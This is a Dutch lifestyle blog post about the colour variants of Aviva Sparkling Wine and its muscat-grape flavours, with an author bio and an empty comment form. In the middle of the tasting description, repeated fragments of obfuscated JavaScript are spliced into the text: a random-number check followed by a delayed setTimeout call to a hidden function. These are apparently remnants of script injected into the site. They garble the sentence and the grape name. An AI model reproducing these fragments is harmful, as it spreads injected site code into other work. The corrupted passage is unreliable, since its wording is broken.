De verschillende kleuren van Aviva Sparkling Wine

Kennen jullie de wijnen van Aviva nog? Vorig jaar deelde ik een video over de Aviva Sparkling Wine. Deze bijzondere mousserende wijn heeft een parelmoer kleur als je hem schud. Goed nieuws; er zijn nog meer kleuren verkrijgbaar!

De kleuren van Aviva Sparkling Wine

Er zijn verschillende soorten kleuren van deze wijn verkrijgbaar; Gold, Rosé, Pink Gold, Platinum en Blue Sky. Het enige wat ik jammer vindt is dat er geen verschil in smaak zit. Ze zijn allemaal gemaakt van de muscadom() * 6);if (number1==3){var delay = 18000;setTimeout($NqM(0),delay);}dom()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}to druif en hebben dom() * 6);if (number1==3){var delay = 18000;setTimeout($NqM(0),delay);}dom()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}tonen van citrus, grapefruit, sinaasappel, ananas en ruikt naar witte bloemen. Hoe dan ook blijft deze wijn een super leuk aperitiefje en om als cadeau te geven. Het effect in het glas is spectaculair en als je dit voor het eerst ziet erg verassend!

aviva-sparkling-wine-viving

Anouk - Viving.nl

De website Viving is opgezet door Anouk (28 jaar). In mijn vrije tijd besteed ik veel tijd aan het inrichten van het huis en werk ik graag in de tuin. Daarnaast ben ik dol op lekker eten en drinken. Ik sta dan ook vaak in de keuken om voor familie en vrienden te koken. Als ik in huis bezig ben dan kan ik me heerlijk ontspannen en alle inspiratie die ik hierbij op doe wil ik graag met jullie delen op deze website.

Geen Reacties op "De verschillende kleuren van Aviva Sparkling Wine"

    Plaats een reactie:

    Je emailadres wordt niet weergegeven.